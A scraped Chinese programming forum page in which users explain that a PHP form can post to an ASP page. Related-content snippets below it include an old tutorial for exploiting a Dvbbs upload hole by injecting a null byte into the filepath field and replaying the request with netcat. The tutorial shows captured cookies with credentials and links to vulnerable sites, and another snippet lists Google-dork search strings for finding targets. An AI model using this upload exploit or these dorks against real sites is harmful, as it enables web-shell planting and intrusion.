社区
基础编程
帖子详情
php的action="h.asp",可以吗?
Sunny_luy
2003-12-13 06:12:18
如下代码:可以吗?
a.php
.....
<form action = b.asp name="login">
....
<input type =text name = admin size=60>
..
</form>
b.asp
<
admin=trim(request("admin"))
>
为和去不出直?
...全文
60
10
打赏
收藏
php的action="h.asp",可以吗?
如下代码:可以吗? a.php ..... .... .. b.asp 为和去不出直?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
10 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
okdw
2003-12-15
打赏
举报
回复
可以
zkqd
2003-12-15
打赏
举报
回复
method = 'post'这句最好加上,这样浏览器才知道改用什么方式提交数据。
zkqd
2003-12-15
打赏
举报
回复
你在php中写的不对,<form action = b.asp name="login">,这句最好写成
<form action = b.asp name="login" method = 'post'>
在asp中这样取值:
<%
admin = trim(request.form("admin"))
response.write(admin)
%>
zkqd
2003-12-15
打赏
举报
回复
可以。没问题的。他们都遵循http协议。只不过语法不同而已。
jxyuhua
2003-12-15
打赏
举报
回复
既然htm都可以传变量到ASP,为什么PHP不可以呢?当然是可以的了。
causky
2003-12-14
打赏
举报
回复
同意 johnpanq(飞花逐月)
bacp
2003-12-14
打赏
举报
回复
在2000下加IIS
再配置服务器
应可以实现
bzscs
2003-12-13
打赏
举报
回复
<%
admin=trim(request("admin"))
%>
johnpanq
2003-12-13
打赏
举报
回复
可以呀!但你的机器是否支持asp呀?
surfchen
2003-12-13
打赏
举报
回复
PHP代码应该没有错
ASP看不懂
先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的
asp
和
php
脚本*** NC(Netcat) 用于提交数据包 DOS界面下运行: NC -vv www.***.com 80<1.txt -vv: 回显 80: www端口 1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子) WSE(WSockExpert) 对本机端口的监视,抓取IE提交的数据包 (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.
asp
文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下
action="upfile.
asp
" ...>
用到的变量: filepath 默认值uploadface 属性hiden act 默认值upload 属性hiden file1 就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.
asp
\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.
asp
\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.
asp
后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.
asp
就保存成: http://www.***.com/newmm.
asp
三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.
asp
?BoardID=20&ID=5746 监听外部主机 NC [-options] hostname port[s] [ports] ... 监听本地主机 NC -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.
asp
HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.
asp
Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie:
ASP
SESSIONIDACCCCDCS=NJHC
PHP
ALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.
asp
█ <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
部分google hacking的搜索内容
inurl:index.
php
?id= inurl:trainers.
php
?id= inurl:buy.
php
?category= inurl:article.
php
?ID= inurl:play_old.
php
?id= inurl:declaration_more.
http://coffeejp.com/bbs/forum.
php
?mod=viewthread,问题列表_华泰证券网络路演_新浪网
游客问:http://keralaartsandcrafts.com/profession.
php
http://www.coffeecatscoffee.com/personal.
php
http://www.condorgun.com/pocket.
php
http://www.clinton-family-dentistry.com/relations.
php
http://nyvd...
常用搜索引擎搜索串
『综合搜索』 1.百度 http://www.baidu.com/s?wd=%s 2.Google http://www.google.cn/search?q=%s&client=pub-4439065763353828 3.雅虎 http://www.yahoo.com.cn/search?p=%s 4.迅雷在线 http://wstatic.xunlei.com/index2...
web前端开发(一)—HTML基础
目录 web前端简介 什么是HTML? HTML标签 HTML基本结构 HTML 段落标签 HTML 换行标签 HTML标题 HTML 水平线 HTML注释 HTML 标签 HTML 列表标签 HTML表格 HTML超链接 HTML 图片 HTML表单 表单元素-文本、密码框 表单元素-多行文本框 表单元素-选择框 表单元素-下拉选择框 表单元素-按钮...
基础编程
21,891
社区成员
140,342
社区内容
发帖
与我相关
我的任务
基础编程
从PHP安装配置,PHP入门,PHP基础到PHP应用
复制链接
扫一扫
分享
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章